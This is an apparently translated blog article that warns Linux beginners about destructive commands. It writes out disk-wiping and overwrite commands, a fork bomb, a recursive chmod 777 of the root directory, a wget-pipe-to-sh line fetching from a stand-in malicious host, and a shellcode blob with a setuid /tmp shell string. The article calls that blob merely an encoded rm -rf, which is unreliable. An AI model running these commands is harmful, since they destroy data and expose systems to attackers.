Follow the Embedded Learning Station to get more fresh highlights every day.
π€ Usage Tip: This article contains 3732 words and is expected to take about 8 minutes to read~
What are the most dangerous Linux commands?
Many people have asked me this question countless times, and I have always avoided answering because there is no definitive list of dangerous Linux commands.
The tools you have allow you to control and modify every aspect of your operating system. I don’t mean to scare you, but if you are not familiar with these commands and tools, you can easily destroy your system.
Imagine the scenario of a small child at home. The child has many ways to hurt themselves. But does that mean we shouldn’t let the child out of the crib? That would hinder her growth.
This is where parents set boundaries and guide their children. Don’t go near the fire, don’t poke your fingers into the electrical outlets… As the child grows and gains experience, she can turn on the stove, start a fire in the fireplace, and plug in the power cord.
Similarly, if you know some known risky commands, you might avoid falling into the traps of trolls who try to trick you into running commands that disrupt your system.
As you gain experience and understand the meanings and usages of these commands and tools, the chances of destroying your system with foolish and tricky commands will decrease.
My colleague Sreenath has compiled a list of popular dangerous Linux commands. Let’s take a look at how they can take down your Linux system.
Disclaimer: Do not attempt any of the commands mentioned in this article if you do not know what you are doing, or you will bear the consequences.
1. rm -rf /*
This is possibly the most notorious command circulating on various social media. You will often find trolls mentioning this in various discussions.
The rm command is used to delete files/directories. The flags -r and -f indicate that it will recursively delete all files within the specified directory. Now, if you don’t have root privileges, this command won’t cause any harm.
Running sudo rm -rf / will also not cause any problems because most distributions provide a fail-safe option. You need to specify --no-preserve-root to actually run it.
sudo rm -rf / --no-preserve-root
However, a simpler version could be:
sudo rm -rf /*
This will start recursively deleting all files under the root directory, and after a while, your system will freeze and display “error deleting files.” Once restarted, you will be sent to the grub-rescue prompt.
2. Overwrite Your Partition
If you are familiar with file systems, you might know what /dev/sda is. It (usually) refers to your disk drive partition. The > operator is used to write the output of the command before it to the specified location.
Once you run any command and write it to /dev/sda, for example:
echo "Hello" > /dev/sda
This will replace your partition, which contains all the data required to boot the system, with the string Hello.
3. Move Everything to the Black Hole
Every Linux system has a black hole. And that black hole is /dev/null.
Whatever you throw into this area will be lost forever. Moreover, it reports the write process as successful after discarding data, which is its main reason for being destructive.
mv /home/user/* /dev/null
The mv command is used to move or rename files/directories. In the command above, you moved all files in your home directory to the black hole. While the root system is not destroyed, all your personal data will be lost.
4. Format Your Hard Drive
mkfs is a command-line tool used to format disks and partitions. It is a super handy tool for creating partitions for installed operating systems. But the same command can also format your hard drive. Formatting your drive means deleting all files necessary for the system to boot.
mkfs.ext3 /dev/sda
This command does its job, and you end up with an irrecoverably messy system.
5. Fork Bomb
This cute-looking random combination of special characters and symbols is enough to freeze a running system by exhausting system resources.
:(){ :|:& };:
& – Shell background operator. It tells the shell to place the command in the background. Here, it defines a function called : that calls itself twice, once in the foreground and once in the background. This process repeats continuously until the system freezes.
As the name suggests, it forks itself, ultimately becoming a chain bomb that consumes all system resources. You will be forced to restart the system, which is not as bad as the other commands on this list.
6. Overwrite Important Configuration Files
While this is not a command per se, it is more of a preventive measure.
As mentioned earlier, the > operator is used to write to files. It discards what is already in the file and writes new data into it.
command > config_filename
Now, if you use some important configuration files as places to write data, they will be replaced, leaving a corrupted system.
7. Replace Partitions with Garbage Data
/dev/random is a command in Linux that can create garbage data. Combine it with the dd command and your partition, and you get a firebomb that can set your partition ablaze.
dd if=/dev/random of=/dev/sda
dd command is used as a low-level copying tool. Here, it takes random data from /dev/random and replaces the /dev/sda partition with this garbage.
A similar effect can be achieved by:
cat /dev/urandom > filename
Here, it takes garbage data from /dev/urandom (Note: On Linux, /dev/urandom is now equivalent to /dev/random) and fills a file with it. If you do not terminate it using Ctrl + C, the file will occupy a considerable amount of space, which can be disastrous for low-end systems.
8. Expose Your System to Everyone
In Linux, everything is a file, and every file has certain permissions.
You can check permissions using ls -l. The root file system does not allow access to other users without permissions. While this ensures the privacy and security of the system, you can overturn this system with one command.
chmod -R 777 /
The above command exposes all files on the root partition to everyone. This means every user on the system has read, write, and execute permissions. This is detrimental to your system.
9. Download and Run Malicious Content
How do you install software on Linux? You can use the official package manager or software packages that can be used at any time, such as Deb/RPM, Snap, Flatpak, etc.
However, some software is not packaged, and their developers provide shell scripts for download and execution. Take Homebrew as an example:
You download a shell file and run it as root, installing software on your system. Do you see the problem?
While it works for official software like Homebrew, you should carefully check the contents of the shell script you downloaded before running it directly like below:
wget http://malicious_source -O- | sh
This kind of command downloads and runs malicious scripts on your system, which could compromise your system’s security.
10. Obfuscated Commands
In the Linux terminal, there are many ways to run commands. One way is through hexadecimal-encoded commands:
char esp[] __attribute__ ((section(β.textβ))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
While it looks fancy, this is an encoded version of the rm -rf command. It has the same effect as running the previous command. Therefore, be cautious when copying and pasting these fancy commands from the internet.
Summary
pebkac
There is a famous computer term PEBKAC: “The problem exists between keyboard and chair“.
Because ultimately, itβs up to the user (you) to ensure that you do not destroy your system by blindly running any dangerous commands.
UNIX’s job is not to prevent you from lifting a rock and dropping it on your own foot. If you choose to do so, then UNIX’s job is to smash your foot with the rock in the most efficient way it knows.
This saying applies equally to Linux. You have complete control over your operating system. What you choose to do is entirely up to you.
I recommend doing the following to ensure a safer experience.
As I said, there is no fixed list of dangerous Linux commands. There are many more that could be added to this list, and there is no end to it.
I hope this gives you some tips on what you should not do to keep Linux secure.
end
What changes have been brought by the new Raspberry Pi OS update?
Java or Embedded, which one to choose?
These large embedded companies generally offer an annual salary of over 250,000 for fresh graduates…